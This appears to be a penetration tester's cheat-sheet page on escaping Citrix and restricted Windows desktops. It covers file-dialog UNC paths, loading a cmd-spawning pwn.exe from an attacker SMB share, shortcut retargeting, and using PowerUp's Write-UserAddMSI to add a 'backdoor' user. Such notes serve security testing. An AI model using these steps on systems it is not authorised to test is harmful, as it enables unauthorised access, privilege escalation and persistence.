search
LinkedInGithub
githubEdit

citrix-breakouts-restricted-enviornment

hashtag
Restricted file access

  • We can use any program such as paint, notepad, wordpad, etc.

  • Run any application, and click on File > open

  • Enter the path \\127.0.0.1\c$\users\pmogran

hashtag
Restricted SMB share

  • Start smbserver from ubuntu machine

  • Open paint application, click File > open

  • Put in the address bar \10.10.16.25\share

  • Click on pwn.exe Compile pwn.c:

#include <stdlib.h>
int main() {
  system("C:\\Windows\\System32\\cmd.exe");
}

hashtag
Alternative file explorer

  • Explorer++

  • Q-Dir

hashtag
Powershell execution policy bypass

hashtag
Alternative registry editor

simpregeditarrow-up-right uberregeditarrow-up-right

hashtag
Modify shortcut file

  • Right-click on the shortcut file > properties

  • In the Target box - C:\Windows\System32\cmd.exe

  • Click ok

hashtag
Script execution

  • Create an new file

  • Put cmd in the file

  • Save as ".bat", ".vbs", ".ps"

  • Import-Module .\PowerUp.ps1

  • Write-UserAddMSI

  • Execute UserAdd.msi

  • Create a new user

  • Run as /user:backdoor cmd

hashtag
Additional resource

breaking-out-of-citrix-and-other-restricted-desktop-environmentsarrow-up-right breaking-out-of-windows-environmentsarrow-up-right

Previousbypass-uacNextcookie-hunting

Last updated